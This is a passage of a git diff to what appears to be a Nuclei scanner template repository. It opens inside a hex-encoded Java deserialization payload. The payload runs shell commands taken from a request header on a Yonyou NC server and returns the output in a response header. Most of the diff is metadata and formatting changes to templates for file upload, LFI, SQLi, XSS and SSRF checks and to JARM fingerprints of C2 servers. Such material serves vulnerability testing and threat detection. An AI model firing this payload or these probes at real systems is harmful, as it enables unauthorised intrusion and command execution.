0670100186A6176612F6C616E672F7265666C6563742F4D6574686F64070069010006696E766F6B65010039284C6A6176612F6C616E672F4F626A6563743B5B4C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0C006B006C0A006A006D01000967657448656164657208006F01000C582D54304B454E2D494E46300800710100076973456D70747901000328295A0C007300740A004000750100097365745374617475730800770100116A6176612F6C616E672F496E7465676572070079010004545950450100114C6A6176612F6C616E672F436C6173733B0C007B007C09007A007D010004284929560C0004007F0A007A00800100076F732E6E616D650800820100106A6176612F6C616E672F53797374656D07008401000B67657450726F7065727479010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B0C008600870A0085008801000B746F4C6F776572436173650C008A003A0A0040008B01000677696E646F7708008D010007636D642E65786508008F0100022F630800910100072F62696E2F73680800930100022D630800950100116A6176612F7574696C2F5363616E6E65720700970100186A6176612F6C616E672F50726F636573734275696C646572070099010016285B4C6A6176612F6C616E672F537472696E673B29560C0004009B0A009A009C010005737461727401001528294C6A6176612F6C616E672F50726F636573733B0C009E009F0A009A00A00100116A6176612F6C616E672F50726F636573730700A201000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B0C00A400A50A00A300A6010018284C6A6176612F696F2F496E70757453747265616D3B29560C000400A80A009800A90100025C410800AB01000C75736544656C696D69746572010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F7574696C2F5363616E6E65723B0C00AD00AE0A009800AF0100046E6578740C00B1003A0A009800B2010008676574427974657301000428295B420C00B400B50A004000B601002A6F72672E6170616368652E746F6D6361742E7574696C2E636F6465632E62696E6172792E4261736536340800B8010007666F724E616D65010025284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F436C6173733B0C00BA00BB0A002600BC01000C656E636F64654261736536340800BE0100025B420700C00100097365744865616465720800C2010007582D54304B454E0800C4010015284C6A6176612F6C616E672F537472696E673B29560C000400C60A004000C7010005285B4229560C000400C90A004000CA01001F6A6176612F6C616E672F4E6F537563684D6574686F64457863657074696F6E0700CC0100136A6176612E6E696F2E427974654275666665720800CE010004777261700800D00100116765744465636C617265644D6574686F640C00D200660A002600D3010007646F57726974650800D50100136A6176612F6C616E672F457863657074696F6E0700D70100156A6176612F6C616E672F54687265616447726F75700700D90100135B4C6A6176612F6C616E672F537472696E673B0700DB01000D537461636B4D61705461626C6501001F79736F73657269616C2F50776E6572323235373930313132353233373432340100214C79736F73657269616C2F50776E6572323235373930313132353233373432343B01002F6F72672F6170616368652F78616C616E2F78736C74632F72756E74696D652F41627374726163745472616E736C65740700E00A00E1000F0021000200E1000000000002000100040005000100060000002F00010001000000052AB700E2B10000000200070000000600010000003500080000000C000100000005000900DF0000000800140005000100060000043A000A00190000031BA70003014C033DB8001AB6001E4E2DB600221224B6002A3A04190404B6003019042DB60036C000383A0503360615061905BEA202E019051506323A07190701A60006A702CA1907B6003C3A081908123EB600449A000D19081246B600449A0006A702AC1907B600221248B6002A3A04190404B6003019041907B600363A091909C1004A9A0006A702861909B60022124CB6002A3A04190404B6003019041909B600363A091909B60022124EB6002A3A04A7001A3A0A1909B60022B60053B60053124EB6002A3A04A70003190404B6003019041909B600363A091909B60022B600531255B6002A3A04A700143A0B1909B600221255B6002A3A04A70003190404B6003019041909B600363A091909B600221257B6002A3A04190404B6003019041909B60036C000593A0C03360D150D190CB9005D0100A201C5190C150DB9006002003A0E190EB600221262B6002A3A04190404B600301904190EB600363A0F190FB60022126403BD0026B60068190F03BD0003B6006E3A10190FB60022127004BD00265903124053B60068190F04BD00035903127253B6006EC000403A08190801A5000B1908B60076990006A701421910B60022127804BD00265903B2007E53B60068191004BD00035903BB007A591100C8B7008153B6006E571283B80089B6008C128EB6004499001906BD0040590312905359041292535905190853A7001606BD00405903129453590412965359051908533A11BB009859BB009A591911B7009DB600A1B600A7B700AA12ACB600B0B600B3B600B73A1212B9B800BD3A13191312BF04BD0026590312C153B600680104BD00035903191253B6006E3A141910B6002212C305BD002659031240535904124053B60068191005BD00035903BB00405912C5B700C8535904BB0040591914C000C1B700CB53B6006E57A700513A1512CFB800BD3A16191612D104BD0026590312C153B600D4191604BD00035903191253B6006E3A091910B6002212D604BD00265903191653B60068191004BD00035903190953B6006E57A70003043D1C990006A70009840D01A7FE351C990006A70014A7000B3A17A70006A70000840601A7FD1EA700083A18A70003B1000500A400B000B3005000D900E800EB00500237029A029D00CD00350301030400D800050312031500D8000100DD000000E5001B03FF002900070005010700DA070032070038010000FC0017070016FC001A07004002FC002507000369070050166007005010FF002F000E0005010700DA070032070038010700160700400700030000070059010000FE007E07000307000307000302FB0050520700DCFF008A00130005010700DA070032070038010700160700400700030000070059010700030700030700030700DC0700C100010700CDFB004DF9000106F8000506FF000200070005010700DA0700320700380100010700D804FF000200070005010700DA07003207003801000005FF00020002000500010700D8040002000D00000002000E000B0000000A000100020010000A00097074000450776E727077010078757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000017672001D6A617661782E786D6C2E7472616E73666F726D2E54656D706C61746573000000000000000000000078707371007E00003F4000000000000077080000001000000000787871007E000678')}} - - | POST /servlet/~baseapp/nc.message.bs.NCMessageServlet HTTP/1.1 Host: {{Hostname}} @@ -41,4 +40,4 @@ http: dsl: - 'status_code_1 == 200 && contains(header_1,"X-T0ken") && contains(header_1,"MTc5Njc2NTUwNg==")' - 'status_code_2 == 200 && contains(header_2,"X-T0ken") && contains(header_2,"MTc5Njc2NTUwNQ==")' - condition: or \ No newline at end of file + condition: or diff --git a/http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml index 91eeb60c80..7a45064a08 100644 --- a/http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml +++ b/http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml @@ -7,9 +7,9 @@ info: description: | There is an arbitrary file upload vulnerability in the getemaildata.php file of UFIDA U8 CRM customer relationship management system. An attacker can obtain server permissions through the vulnerability and attack the server. metadata: + verified: true max-request: 2 fofa-query: body="用友U8CRM" - verified: true tags: yonyou,file-upload,u8-crm,intrusive http: @@ -38,8 +38,6 @@ http: upload ------WebKitFormBoundaryAVuAKsvesmnWtgEP-- - - - | GET /tmpfile/{{path}}.tmp.mht HTTP/1.1 Host: {{Hostname}} @@ -58,4 +56,4 @@ http: name: path group: 1 regex: - - '([a-zA-Z0-9]+)\.tmp\.mht' \ No newline at end of file + - '([a-zA-Z0-9]+)\.tmp\.mht' diff --git a/http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml b/http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml index d9e88502a9..338dd8163c 100644 --- a/http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml +++ b/http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml @@ -5,13 +5,13 @@ info: author: SleepingBag945 severity: high description: | - There is an arbitrary file reading vulnerability in getemaildata.php of UFIDA U8 CRM customer relationship management system. An attacker can obtain sensitive files in the server through the vulnerability. + There is an arbitrary file reading vulnerability in getemaildata.php of UFIDA U8 CRM customer relationship management system. An attacker can obtain sensitive files in the server through the vulnerability. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20CRM%E5%AE%A2%E6%88%B7%E5%85%B3%E7%B3%BB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20getemaildata.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md metadata: + verified: true max-request: 1 fofa-query: body="用友U8CRM" - verified: true tags: yonyou,u8-crm,lfi http: @@ -26,4 +26,4 @@ http: dsl: - 'status_code_1 == 200' - 'contains(body_1,"bit app support") && contains(body_1,"extensions") && contains(body_1,"fonts")' - condition: and \ No newline at end of file + condition: and diff --git a/http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml index 66feb4827d..82aa51403a 100644 --- a/http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml +++ b/http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml @@ -10,12 +10,11 @@ info: - https://www.tencentcloud.com/document/product/627/38435 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-89 - tags: yonyou,oa,sqli metadata: max-request: 1 - + tags: yonyou,oa,sqli variables: num: "999999999" diff --git a/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml index 6b0551c2b8..d01d8c0fef 100644 --- a/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml +++ b/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml @@ -10,9 +10,9 @@ info: - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-grp-u8-bx_historyDataChecks-sqli.yaml - https://github.com/MD-SEC/MDPOCS/blob/main/Yongyou_Grp_U8_bx_historyDataCheck_Sql_Poc.py metadata: - fofa-query: icon_hash="-299520369" - max-request: 2 verified: true + max-request: 2 + fofa-query: icon_hash="-299520369" tags: yonyou,grp,sqli http: @@ -21,7 +21,6 @@ http: GET /login.jsp HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - - | POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1 Host: {{Hostname}} diff --git a/http/vulnerabilities/zend/zend-v1-xss.yaml b/http/vulnerabilities/zend/zend-v1-xss.yaml index f2617d2bf3..0a23b805f2 100644 --- a/http/vulnerabilities/zend/zend-v1-xss.yaml +++ b/http/vulnerabilities/zend/zend-v1-xss.yaml @@ -9,8 +9,8 @@ info: reference: - https://twitter.com/c3l3si4n/status/1600035722148212737 metadata: - max-request: 2 verified: true + max-request: 2 google-query: inurl:"/tests/Zend/Http/" tags: zend,zendframework,xss @@ -21,6 +21,7 @@ http: - "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3¶m=" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml b/http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml index d428c0d81f..c563976d3b 100644 --- a/http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml +++ b/http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.5 cwe-id: CWE-22 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"VMG1312-B10D" tags: misconfig,unauth,zyxel,lfi,msf diff --git a/http/vulnerabilities/zyxel/unauth-ztp-ping.yaml b/http/vulnerabilities/zyxel/unauth-ztp-ping.yaml index 6f7e8209af..02dd6a8727 100644 --- a/http/vulnerabilities/zyxel/unauth-ztp-ping.yaml +++ b/http/vulnerabilities/zyxel/unauth-ztp-ping.yaml @@ -11,9 +11,9 @@ info: - https://www.fullspectrum.dev/the-hunt-for-cve-2023-28771-friends-part-2-fingerprinting-handler/ - https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-remote-command-injection-vulnerability-of-firewalls metadata: + verified: true max-request: 1 shodan-query: title:"USG FLEX" - verified: true tags: misconfig,unauth,zyxel,ztp,rce,oast http: diff --git a/http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml b/http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml index dcb8294680..4887bb3fa2 100644 --- a/http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml +++ b/http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml @@ -9,8 +9,8 @@ info: reference: - https://xz.aliyun.com/t/7414 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"ZzzCMS" fofa-query: title="ZzzCMS" tags: zzzcms,info,disclosure diff --git a/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml b/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml index 2f09159dc7..afb986c8ab 100644 --- a/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml +++ b/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml @@ -7,12 +7,11 @@ info: reference: - https://www.hacking8.com/bug-web/Zzzcms/Zzzcms-1.75-ssrf.html metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"ZzzCMS" fofa-query: title="ZzzCMS" tags: zzzcms,ssrf,oast - variables: filename: "{{to_lower(rand_text_alpha(4))}}" diff --git a/http/vulnerabilities/zzzcms/zzzcms-xss.yaml b/http/vulnerabilities/zzzcms/zzzcms-xss.yaml index d12dabddfb..ee5282bd9b 100644 --- a/http/vulnerabilities/zzzcms/zzzcms-xss.yaml +++ b/http/vulnerabilities/zzzcms/zzzcms-xss.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/Ares-X/VulWiki/blob/master/Web%E5%AE%89%E5%85%A8/Zzzcms/Zzzcms%201.75%20xss%E6%BC%8F%E6%B4%9E.md metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"ZzzCMS" fofa-query: title="ZzzCMS" tags: zzzcms,xss diff --git a/network/cves/2018/CVE-2018-2628.yaml b/network/cves/2018/CVE-2018-2628.yaml index a02bc3a0b0..0a2f477a7c 100644 --- a/network/cves/2018/CVE-2018-2628.yaml +++ b/network/cves/2018/CVE-2018-2628.yaml @@ -18,7 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-2628 cwe-id: CWE-502 - epss-score: 0.97531 + epss-score: 0.97536 + epss-percentile: 0.99991 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/network/cves/2022/CVE-2022-31793.yaml b/network/cves/2022/CVE-2022-31793.yaml index 8c4b279082..d5aaf9f760 100644 --- a/network/cves/2022/CVE-2022-31793.yaml +++ b/network/cves/2022/CVE-2022-31793.yaml @@ -18,7 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-31793 cwe-id: CWE-22 - epss-score: 0.25931 + epss-score: 0.22965 + epss-percentile: 0.95969 cpe: cpe:2.3:a:inglorion:muhttpd:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/network/detection/java-rmi-detect.yaml b/network/detection/java-rmi-detect.yaml index cb80e57efe..917b8917d4 100644 --- a/network/detection/java-rmi-detect.yaml +++ b/network/detection/java-rmi-detect.yaml @@ -4,24 +4,21 @@ info: name: Java Remote Method Invocation Protocol - Detect author: F1tz severity: info - tags: network,rmi,java,detect description: | Java Remote Method Invocation protocol is susceptible to information disclosure. It allows for unauthenticated network attacks, which can result in unauthorized operating system takeover including arbitrary code execution. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 - + tags: network,rmi,java,detect tcp: - inputs: - data: "{{hex_decode('4a524d4900024b')}}" - host: - "{{Hostname}}" read-size: 1024 - matchers: - type: regex part: raw diff --git a/network/detection/weblogic-iiop-detect.yaml b/network/detection/weblogic-iiop-detect.yaml index de4fe4b355..9459f61fec 100644 --- a/network/detection/weblogic-iiop-detect.yaml +++ b/network/detection/weblogic-iiop-detect.yaml @@ -4,16 +4,14 @@ info: name: Weblogic IIOP Protocol Detection author: F1tz severity: info - tags: network,weblogic,detect description: | The IIOP (Internet Inter-ORB Protocol) protocol makes it possible for distributed programs written in different programming languages to communicate over the Internet. metadata: max-request: 1 - + tags: network,weblogic,detect tcp: - inputs: - data: "{{hex_decode('47494f50010200030000001700000002000000000000000b4e616d6553657276696365')}}" - host: - "{{Hostname}}" read-size: 1024 diff --git a/network/detection/weblogic-t3-detect.yaml b/network/detection/weblogic-t3-detect.yaml index 41d9d95899..e28db18f8c 100644 --- a/network/detection/weblogic-t3-detect.yaml +++ b/network/detection/weblogic-t3-detect.yaml @@ -4,15 +4,24 @@ info: name: Weblogic T3 Protocol Detection author: F1tz,milo2012,wdahlenb severity: info - tags: network,weblogic,detect description: | T3 is the protocol used to transport information between WebLogic servers and other types of Java programs. metadata: max-request: 2 - + tags: network,weblogic,detect tcp: - inputs: - - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" + - data: "t3 12.2.1 + + AS:255 + + HL:19 + + MS:10000000 + + PU:t3://us-l-breens:7001 + + \n" host: - "{{Hostname}}" read-size: 1024 @@ -20,6 +29,7 @@ tcp: - type: word words: - "HELO" + extractors: - type: regex part: body @@ -28,7 +38,17 @@ tcp: - "HELO:(.*).false" - inputs: - - data: "t3s 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" + - data: "t3s 12.2.1 + + AS:255 + + HL:19 + + MS:10000000 + + PU:t3://us-l-breens:7001 + + \n" host: - "tls://{{Hostname}}" read-size: 1024 @@ -36,6 +56,7 @@ tcp: - type: word words: - "HELO" + extractors: - type: regex part: body diff --git a/network/jarm/c2/cobalt-strike-c2-jarm.yaml b/network/jarm/c2/cobalt-strike-c2-jarm.yaml index 0e2bdb4791..4b8d42eeba 100644 --- a/network/jarm/c2/cobalt-strike-c2-jarm.yaml +++ b/network/jarm/c2/cobalt-strike-c2-jarm.yaml @@ -9,20 +9,17 @@ info: reference: - https://blog.sekoia.io/hunting-and-detecting-cobalt-strike/ metadata: + verified: true max-request: 1 shodan-query: ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1+port:443 - verified: true tags: jarm,c2,ir,osint - tcp: - inputs: - data: 2E type: hex - host: - "{{Hostname}}" - matchers: - type: dsl dsl: - - "jarm(Hostname) == '07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1'" \ No newline at end of file + - "jarm(Hostname) == '07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1'" diff --git a/network/jarm/c2/covenant-c2-jarm.yaml b/network/jarm/c2/covenant-c2-jarm.yaml index 2aab2dd578..f2cbad1bd9 100644 --- a/network/jarm/c2/covenant-c2-jarm.yaml +++ b/network/jarm/c2/covenant-c2-jarm.yaml @@ -12,16 +12,13 @@ info: metadata: max-request: 1 tags: c2,ir,osint,covenant,jarm - tcp: - inputs: - data: 2E type: hex - host: - "{{Hostname}}" - matchers: - type: dsl dsl: - - "jarm(Hostname) == '21d14d00000000021c21d14d21d21d1ee8ae98bf3ef941e91529a93ac62b8b'" \ No newline at end of file + - "jarm(Hostname) == '21d14d00000000021c21d14d21d21d1ee8ae98bf3ef941e91529a93ac62b8b'" diff --git a/network/jarm/c2/deimos-c2-jarm.yaml b/network/jarm/c2/deimos-c2-jarm.yaml index 94f0d3bb38..46ca90b603 100644 --- a/network/jarm/c2/deimos-c2-jarm.yaml +++ b/network/jarm/c2/deimos-c2-jarm.yaml @@ -12,16 +12,13 @@ info: metadata: max-request: 1 tags: c2,ir,osint,deimos,jarm,network - tcp: - inputs: - data: 2E type: hex - host: - "{{Hostname}}" - matchers: - type: dsl dsl: - - "jarm(Hostname) == '00000000000000000041d00000041d9535d5979f591ae8e547c5e5743e5b64'" \ No newline at end of file + - "jarm(Hostname) == '00000000000000000041d00000041d9535d5979f591ae8e547c5e5743e5b64'" diff --git a/network/jarm/c2/evilginx2-jarm.yaml b/network/jarm/c2/evilginx2-jarm.yaml index 98a4f2c59a..1a2d5d6be6 100644 --- a/network/jarm/c2/evilginx2-jarm.yaml +++ b/network/jarm/c2/evilginx2-jarm.yaml @@ -12,16 +12,13 @@ info: metadata: max-request: 1 tags: evilginx2,c2,phishing,jarm - tcp: - inputs: - data: 2E type: hex - host: - "{{Hostname}}" - matchers: - type: dsl dsl: - - "jarm(Hostname) == '20d14d20d21d20d20c20d14d20d20daddf8a68a1444c74b6dbe09910a511e6'" \ No newline at end of file + - "jarm(Hostname) == '20d14d20d21d20d20c20d14d20d20daddf8a68a1444c74b6dbe09910a511e6'" diff --git a/network/jarm/c2/generic-c2-jarm.yaml b/network/jarm/c2/generic-c2-jarm.yaml index 650131c993..88d9a01fde 100644 --- a/network/jarm/c2/generic-c2-jarm.yaml +++ b/network/jarm/c2/generic-c2-jarm.yaml @@ -11,12 +11,10 @@ info: metadata: max-request: 1 tags: network,c2,jarm,cti - tcp: - inputs: - data: 2E type: hex - host: - "{{Hostname}}" matchers: diff --git a/network/jarm/c2/grat2-c2-jarm.yaml b/network/jarm/c2/grat2-c2-jarm.yaml index 8143f8d1b2..bdc12808e7 100644 --- a/network/jarm/c2/grat2-c2-jarm.yaml +++ b/network/jarm/c2/grat2-c2-jarm.yaml @@ -12,16 +12,13 @@ info: metadata: max-request: 1 tags: shad0w,c2,osint,ir,jarm - tcp: - inputs: - data: 2E type: hex - host: - "{{Hostname}}" - matchers: - type: dsl dsl: - - "jarm(Hostname) == '2ad2ad0002ad2ad00042d42d000000ad9bf51cc3f5a1e29eecb81d0c7b06eb'" \ No newline at end of file + - "jarm(Hostname) == '2ad2ad0002ad2ad00042d42d000000ad9bf51cc3f5a1e29eecb81d0c7b06eb'" diff --git a/network/jarm/c2/havoc-c2-jarm.yaml b/network/jarm/c2/havoc-c2-jarm.yaml index 39e88ea368..346a43a385 100644 --- a/network/jarm/c2/havoc-c2-jarm.yaml +++ b/network/jarm/c2/havoc-c2-jarm.yaml @@ -10,20 +10,17 @@ info: - https://github.com/HavocFramework/Havoc - https://github.com/montysecurity/C2-Tracker metadata: - shodan-query: 'ssl:postalCode=3540 ssl.jarm:3fd21b20d00000021c43d21b21b43de0a012c76cf078b8d06f4620c2286f5e' - max-request: 1 verified: "true" + max-request: 1 + shodan-query: 'ssl:postalCode=3540 ssl.jarm:3fd21b20d00000021c43d21b21b43de0a012c76cf078b8d06f4620c2286f5e' tags: c2,ir,osint,havoc,network - tcp: - inputs: - data: 2E type: hex - host: - "{{Hostname}}" - matchers: - type: dsl dsl: - - "jarm(Hostname) == '3fd21b20d00000021c43d21b21b43de0a012c76cf078b8d06f4620c2286f5e'" \ No newline at end of file + - "jarm(Hostname) == '3fd21b20d00000021c43d21b21b43de0a012c76cf078b8d06f4620c2286f5e'" diff --git a/network/jarm/c2/mac-c2-jarm.yaml b/network/jarm/c2/mac-c2-jarm.yaml index 231b6f400b..bf0e2fc1e3 100644 --- a/network/jarm/c2/mac-c2-jarm.yaml +++ b/network/jarm/c2/mac-c2-jarm.yaml @@ -12,18 +12,15 @@ info: metadata: max-request: 1 tags: c2,ir,osint,macc2,jarm - tcp: - inputs: - data: 2E type: hex - host: - "{{Hostname}}" - matchers: - type: dsl dsl: - "jarm(Hostname) == '2ad2ad0002ad2ad22c42d42d000000faabb8fd156aa8b4d8a37853e1063261'" - "jarm(Hostname) == '2ad2ad0002ad2ad00042d42d000000ad9bf51cc3f5a1e29eecb81d0c7b06eb'" - condition: or \ No newline at end of file + condition: or diff --git a/network/jarm/c2/macshell-c2-jarm.yaml b/network/jarm/c2/macshell-c2-jarm.yaml index 86281303ae..049d71dbe1 100644 --- a/network/jarm/c2/macshell-c2-jarm.yaml +++ b/network/jarm/c2/macshell-c2-jarm.yaml @@ -12,16 +12,13 @@ info: metadata: max-request: 1 tags: c2,ir,osint,macshell,jarm - tcp: - inputs: - data: 2E type: hex - host: - "{{Hostname}}" - matchers: - type: dsl dsl: - - "jarm(Hostname) == '2ad000000000000000000000000000eeebf944d0b023a00f510f06a29b4f46'" \ No newline at end of file + - "jarm(Hostname) == '2ad000000000000000000000000000eeebf944d0b023a00f510f06a29b4f46'" diff --git a/network/jarm/c2/merlin-c2-jarm.yaml b/network/jarm/c2/merlin-c2-jarm.yaml index e55b73f887..2cb2a8cb7b 100644 --- a/network/jarm/c2/merlin-c2-jarm.yaml +++ b/network/jarm/c2/merlin-c2-jarm.yaml @@ -12,16 +12,13 @@ info: metadata: max-request: 1 tags: c2,ir,osint,merlin,jarm - tcp: - inputs: - data: 2E type: hex - host: - "{{Hostname}}" - matchers: - type: dsl dsl: - - "jarm(Hostname) == '29d21b20d29d29d21c41d21b21b41d494e0df9532e75299f15ba73156cee38'" \ No newline at end of file + - "jarm(Hostname) == '29d21b20d29d29d21c41d21b21b41d494e0df9532e75299f15ba73156cee38'" diff --git a/network/jarm/c2/metasploit-c2-jarm.yaml b/network/jarm/c2/metasploit-c2-jarm.yaml index 84f774ef75..25cb34b4d3 100644 --- a/network/jarm/c2/metasploit-c2-jarm.yaml +++ b/network/jarm/c2/metasploit-c2-jarm.yaml @@ -12,18 +12,15 @@ info: metadata: max-request: 1 tags: c2,ir,osint,metasploit,jarm - tcp: - inputs: - data: 2E type: hex - host: - "{{Hostname}}" - matchers: - type: dsl dsl: - "jarm(Hostname) == '07d14d16d21d21d00042d43d000000aa99ce74e2c6d013c745aa52b5cc042d'" - "jarm(Hostname) == '07d14d16d21d21d07c42d43d000000f50d155305214cf247147c43c0f1a823'" - condition: or \ No newline at end of file + condition: or diff --git a/network/jarm/c2/mythic-c2-jarm.yaml b/network/jarm/c2/mythic-c2-jarm.yaml index 3bca43bcb2..906a54dcab 100644 --- a/network/jarm/c2/mythic-c2-jarm.yaml +++ b/network/jarm/c2/mythic-c2-jarm.yaml @@ -13,16 +13,13 @@ info: metadata: max-request: 1 tags: c2,ir,osint,mythic,jarm - tcp: - inputs: - data: 2E type: hex - host: - "{{Hostname}}" - matchers: - type: dsl dsl: - - "jarm(Hostname) == '2ad2ad0002ad2ad00042d42d000000ad9bf51cc3f5a1e29eecb81d0c7b06eb'" \ No newline at end of file + - "jarm(Hostname) == '2ad2ad0002ad2ad00042d42d000000ad9bf51cc3f5a1e29eecb81d0c7b06eb'" diff --git a/network/jarm/c2/posh-c2-jarm.yaml b/network/jarm/c2/posh-c2-jarm.yaml index 41d758745e..118bd8d4ac 100644 --- a/network/jarm/c2/posh-c2-jarm.yaml +++ b/network/jarm/c2/posh-c2-jarm.yaml @@ -13,16 +13,13 @@ info: metadata: max-request: 1 tags: c2,ir,osint,posh,jarm - tcp: - inputs: - data: 2E type: hex - host: - "{{Hostname}}" - matchers: - type: dsl dsl: - - "jarm(Hostname) == '2ad2ad0002ad2ad22c42d42d000000faabb8fd156aa8b4d8a37853e1063261'" \ No newline at end of file + - "jarm(Hostname) == '2ad2ad0002ad2ad22c42d42d000000faabb8fd156aa8b4d8a37853e1063261'" diff --git a/network/jarm/c2/shad0w-c2-jarm.yaml b/network/jarm/c2/shad0w-c2-jarm.yaml index 2aee72b120..4e726c82df 100644 --- a/network/jarm/c2/shad0w-c2-jarm.yaml +++ b/network/jarm/c2/shad0w-c2-jarm.yaml @@ -12,16 +12,13 @@ info: metadata: max-request: 1 tags: shad0w,c2,osint,ir,jarm - tcp: - inputs: - data: 2E type: hex - host: - "{{Hostname}}" - matchers: - type: dsl dsl: - - "jarm(Hostname) == '2ad2ad0002ad2ad00042d42d000000ad9bf51cc3f5a1e29eecb81d0c7b06eb'" \ No newline at end of file + - "jarm(Hostname) == '2ad2ad0002ad2ad00042d42d000000ad9bf51cc3f5a1e29eecb81d0c7b06eb'" diff --git a/network/jarm/c2/silenttrinity-c2-jarm.yaml b/network/jarm/c2/silenttrinity-c2-jarm.yaml index 7382a6ae17..d23edf1799 100644 --- a/network/jarm/c2/silenttrinity-c2-jarm.yaml +++ b/network/jarm/c2/silenttrinity-c2-jarm.yaml @@ -12,16 +12,13 @@ info: metadata: max-request: 1 tags: silenttrinity,c2,osint,ir,jarm - tcp: - inputs: - data: 2E type: hex - host: - "{{Hostname}}" - matchers: - type: dsl dsl: - - "jarm(Hostname) == '2ad2ad0002ad2ad00042d42d000000ad9bf51cc3f5a1e29eecb81d0c7b06eb'" \ No newline at end of file + - "jarm(Hostname) == '2ad2ad0002ad2ad00042d42d000000ad9bf51cc3f5a1e29eecb81d0c7b06eb'" diff --git a/network/jarm/c2/sliver-c2-jarm.yaml b/network/jarm/c2/sliver-c2-jarm.yaml index 7d5fb747ac..f66c63e374 100644 --- a/network/jarm/c2/sliver-c2-jarm.yaml +++ b/network/jarm/c2/sliver-c2-jarm.yaml @@ -12,16 +12,13 @@ info: metadata: max-request: 1 tags: c2,ir,osint,sliver,jarm - tcp: - inputs: - data: 2E type: hex - host: - "{{Hostname}}" - matchers: - type: dsl dsl: - - "jarm(Hostname) == '2ad2ad0002ad2ad00041d2ad2ad41da5207249a18099be84ef3c8811adc883'" \ No newline at end of file + - "jarm(Hostname) == '2ad2ad0002ad2ad00041d2ad2ad41da5207249a18099be84ef3c8811adc883'" diff --git a/ssl/c2/asyncrat-c2.yaml b/ssl/c2/asyncrat-c2.yaml index dd0fbfa240..f25bb10f9d 100644 --- a/ssl/c2/asyncrat-c2.yaml +++ b/ssl/c2/asyncrat-c2.yaml @@ -9,15 +9,13 @@ info: reference: | https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat metadata: - max-request: 1 verified: "true" + max-request: 1 shodan-query: ssl:"AsyncRAT Server" censys-query: services.tls.certificates.leaf_data.issuer.common_name:AsyncRat tags: c2,ir,osint,malware - ssl: - address: "{{Host}}:{{Port}}" - matchers: - type: word part: issuer_cn diff --git a/ssl/c2/bitrat-c2.yaml b/ssl/c2/bitrat-c2.yaml index bb6c6da9c5..66e6bde33a 100644 --- a/ssl/c2/bitrat-c2.yaml +++ b/ssl/c2/bitrat-c2.yaml @@ -9,14 +9,12 @@ info: reference: | https://github.com/thehappydinoa/awesome-censys-queries#bitrat-- metadata: - censys-query: 